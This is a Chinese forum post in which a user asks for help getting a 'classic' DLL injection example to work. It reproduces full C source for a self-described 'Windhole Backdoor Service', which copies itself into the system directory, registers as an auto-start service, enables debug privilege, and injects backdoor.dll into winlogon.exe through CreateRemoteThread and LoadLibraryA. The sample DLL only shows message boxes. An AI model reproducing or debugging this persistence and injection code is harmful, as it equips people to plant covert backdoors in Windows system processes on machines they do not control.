近来看了一个网上经典的Dll注入的例子,拷下来运行了一下 好不容易调通了,最后还是不能正常注入,找不到原因,求救一个各位大牛看一下 帮帮我!!谢谢了
注入程序如下,在xp vc6.0调试通过
/*---------------------------------------------------------------------
//mysvr.c
//Coder: sjdf
//E-mail: sjdf1@163.com
//Create date: 2002.8.11
//Last modify date: 2003.10.28
//Test platform: Win2000 Adv Server + sp4
---------------------------------------------------------------------*/
//Header
//#include "bkdlldata.h" // maoge注释掉了
#include <stdio.h>
#include <string.h>
#include <windows.h>
// #include <psapi.h>
#include "PSAPI.H"
#include <winsvc.h>
#pragma comment(lib, "psapi.Lib") // maoge添加的。[maoge注]
//---------------------------------------------------------------------
//Global constant
char SERVICENAME[9] = "windhole";
const char DISPLAYNAME[33] = "Windhole Backdoor Service";
const char SRVFILENAME[13] = "windhole.exe";
const char BDRFILENAME[13] = "backdoor.dll";
const char DESTPROC[19] = "winlogon.exe"; // 注:本系统进程注入DLL文件后与常规的进程
// 不一样,需要特殊处理,你可以试一试其它进
// 程,如exeplorer.exe。[maoge注]
//---------------------------------------------------------------------
//Glabal variable
SERVICE_STATUS MyServiceStatus;
SERVICE_STATUS_HANDLE MyServiceStatusHandle;
int WillStop = 0;
//---------------------------------------------------------------------
//Function declaration
int AddPrivilege(const char *Name);
void MyServiceStart (int argc, char *argv[]);
void MyServiceCtrlHandler (DWORD opcode);
DWORD MyWrokThread(void);
DWORD ProcessToPID(const char *InputProcessName);
//---------------------------------------------------------------------
//Function definition
int main(int argc,char *argv[])
{
//如果参数为“-service”就作为服务启动
if ((argc >= 2) && (!lstrcmp(argv[1],"-service")))
{
SERVICE_TABLE_ENTRY DispatchTable[] =
{
{SERVICENAME, (LPSERVICE_MAIN_FUNCTION)MyServiceStart},
{NULL, NULL}
};
if (!StartServiceCtrlDispatcher( DispatchTable))
{
return 1;
}
return 0;
}
//否则就自动安装服务
//复制自身到系统目录
char DestName[MAX_PATH + 1];
char NowName[MAX_PATH + 1];
ZeroMemory(DestName,MAX_PATH + 1);
ZeroMemory(NowName,MAX_PATH + 1);
if (!GetSystemDirectory(DestName,MAX_PATH))
{
printf("GetSystemDirectory() error = %d\nInstall failure!\n",GetLastError());
return 1;
}
lstrcat(DestName,"\\");
lstrcat(DestName,SRVFILENAME);
if (!GetModuleFileName(NULL,NowName,MAX_PATH))
{
printf("GetModuleFileName() error = %d\nInstall failure!\n",GetLastError());
return 1;
}
if (!CopyFile(NowName,DestName,0))
{
printf("CopyFile() error = %d\nInstall failure!\n",GetLastError());
return 1;
}
//安装服务
SC_HANDLE newService, scm;
//连接SCM
if (!(scm = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE)))
{
printf("OpenSCManager() error = %d\nInstall failure!\n",GetLastError());
return 1;
}
//当作为服务启动时加上“-service”参数
lstrcat(DestName," -service");
if (!(newService = CreateService(scm,
SERVICENAME,
DISPLAYNAME,
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_NORMAL,
DestName,
NULL, NULL, NULL, NULL, NULL)))
{
printf("CreateService() error = %d\nInstall failure!\n",GetLastError());
}
else
{
printf("Install success!\n");
char *pra[] = {"-service", "\0"};
if (!StartService(newService,1,(const char **)pra))
{
printf("StartService() error = %d\nStart service failure!\n",GetLastError());
}
else
{
printf("Start service Success!\n");
}
}
CloseServiceHandle(newService);
CloseServiceHandle(scm);
return 0;
}
//---------------------------------------------------------------------
DWORD MyWorkThread(void)
{
Sleep(4000);
FILE *fp;
if ((fp = fopen(BDRFILENAME,"rb")) == NULL) // "wb"更改成了"rb",以表示只读,
{ // 否则会重写backdoor.dll。[maoge注]
WillStop = 1;
return 1;
}
// 以下五行maoge给注释掉了,几乎是没什么用处。[maoge注]
/*
fwrite(data1,sizeof(data1),1,fp);
fwrite(data2,sizeof(data2),1,fp);
fwrite(data3,sizeof(data3),1,fp);
fwrite(data4,sizeof(data4),1,fp);
fwrite(data5,sizeof(data5),1,fp);
*/
fclose(fp);
char FullName[MAX_PATH + 1];
ZeroMemory(FullName,MAX_PATH + 1);
GetSystemDirectory(FullName,MAX_PATH);
lstrcat(FullName,"\\");
lstrcat(FullName,BDRFILENAME);
//如果是要打开系统进程,一定要先申请debug权限
AddPrivilege(SE_DEBUG_NAME);
HANDLE hRemoteProcess = NULL;
DWORD Pid = ProcessToPID(DESTPROC);
if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许远程创建线程
PROCESS_VM_OPERATION | //允许远程VM操作
PROCESS_VM_WRITE | //允许远程VM写
PROCESS_VM_READ, //允许远程VM读
0,
Pid)) == NULL)
{
WillStop = 1;
return 1;
}
char *pDllName = NULL;
if ((pDllName = (char *)VirtualAllocEx( hRemoteProcess,
NULL,
lstrlen(FullName) + 1,
MEM_COMMIT,
PAGE_READWRITE)) == NULL)
{
CloseHandle(hRemoteProcess);
WillStop = 1;
return 1;
}
//使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
if (WriteProcessMemory(hRemoteProcess,
pDllName,
FullName,
lstrlen(FullName),
NULL) == 0)
{
VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
CloseHandle(hRemoteProcess);
WillStop = 1;
return 1;
}
//计算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = NULL;
if ((pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle(TEXT("kernel32")), "LoadLibraryA")) == NULL)
{
VirtualFreeEx(hRemoteProcess,pDllName,0,MEM_RELEASE);
CloseHandle(hRemoteProcess);
WillStop = 1;
return 1;
}
DWORD ThreadId = 0;
CreateRemoteThread(hRemoteProcess, //被嵌入的远程进程
NULL,
0,
pfnStartAddr, //LoadLibraryA的入口地址
pDllName,
0,
&ThreadId);
CloseHandle(hRemoteProcess);
WillStop = 1;
return 0;
}
//---------------------------------------------------------------------
void MyServiceStart (int argc, char *argv[])
{
if (!(MyServiceStatusHandle = RegisterServiceCtrlHandler(SERVICENAME,(LPHANDLER_FUNCTION)MyServiceCtrlHandler)))
{
return;
}
MyServiceStatus.dwServiceType = SERVICE_WIN32;
MyServiceStatus.dwCurrentState = SERVICE_START_PENDING;
MyServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwServiceSpecificExitCode = 0;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}
DWORD Threadid;
// Initialization code goes here. Handle error condition
if (!CreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)MyWorkThread,NULL, 0, &Threadid))
{
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
MyServiceStatus.dwWin32ExitCode = GetLastError();
MyServiceStatus.dwServiceSpecificExitCode = GetLastError();
SetServiceStatus(MyServiceStatusHandle, &MyServiceStatus);
return;
}
// Initialization complete - report running status.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}
while(WillStop == 0)
{
Sleep(200);
}
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
return;
}
//---------------------------------------------------------------------
void MyServiceCtrlHandler (DWORD Opcode)
{
switch(Opcode)
{
case SERVICE_CONTROL_PAUSE:
// Do whatever it takes to pause here.
MyServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
// Do whatever it takes to continue here.
MyServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
// Do whatever it takes to stop here.
MyServiceStatus.dwWin32ExitCode = 0;
MyServiceStatus.dwCurrentState = SERVICE_STOPPED;
MyServiceStatus.dwCheckPoint = 0;
MyServiceStatus.dwWaitHint = 0;
SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus);
WillStop = 1;
return;
case SERVICE_CONTROL_INTERROGATE:
// Fall through to send current status.
break;
}
// Send current status.
if (!SetServiceStatus (MyServiceStatusHandle, &MyServiceStatus))
{
return;
}
return;
}
//---------------------------------------------------------------------
//为当前进程增加指定的特权
int AddPrivilege(const char *Name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID Luid;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
printf("OpenProcessToken error.\n");
return 1;
}
if (!LookupPrivilegeValue(NULL,Name,&Luid))//修改系统进程权限
{
printf("LookupPrivilegeValue error.\n");
return 1;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = Luid;
if (!AdjustTokenPrivileges(hToken, //通知系统修改进程权限
0,
&tp,
sizeof(TOKEN_PRIVILEGES),
NULL,
NULL))
{
printf("AdjustTokenPrivileges error.\n");
return 1;
}
return 0;
}
//---------------------------------------------------------------------
//将进程名转换为PID的函数
DWORD ProcessToPID(const char *InputProcessName)
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
HANDLE hProcess = NULL;
HMODULE hMod = NULL;
char szProcessName[MAX_PATH] = "UnknownProcess";
AddPrivilege(SE_DEBUG_NAME);
// 计算目前有多少进程, aProcesses[]用来存放有效的进程PIDs
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
{
return 0;
}
cProcesses = cbNeeded / sizeof(DWORD);
// 按有效的PID遍历所有的进程
for ( i = 0; i < cProcesses; i++ )
{
// 打开特定PID的进程
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i]);
// 取得特定PID的进程名
if ( hProcess )
{
if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
GetModuleBaseName( hProcess, hMod,
szProcessName, sizeof(szProcessName) );
//将取得的进程名与输入的进程名比较,如相同则返回进程PID
if(!stricmp(szProcessName, InputProcessName))
{
CloseHandle( hProcess );
return aProcesses[i];
}
}
}//end of if ( hProcess )
}//end of for
//没有找到相应的进程名,返回0
CloseHandle( hProcess );
return 0;
}
//--------------------------------
dll程序如下
/*****************************************************
//backdoor.cpp
//Provider: rxxi
//E-mail: rxxi@sohu.com
//Date: 2006.4.27
// Compiled in WinXP SP2
******************************************************/
#include <windows.h>
#include <stdio.h>
// void SysReboot();
BOOL APIENTRY DllMain(HANDLE hModule, DWORD reason, LPVOID lpReserved)
{
char szProcessId[64];
switch (reason)
{
case DLL_PROCESS_ATTACH:
{
//获取当前进程ID
_itoa(GetCurrentProcessId(), szProcessId, 10);
int ret = MessageBox(NULL, szProcessId, "backdoor.dll", MB_OK);
if (ret != 0)
{
MessageBox(NULL, 0, "系统重启", MB_OK);
//SysSysReboot();
return TRUE;
}
}
default:
return TRUE;
}
}
完毕。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课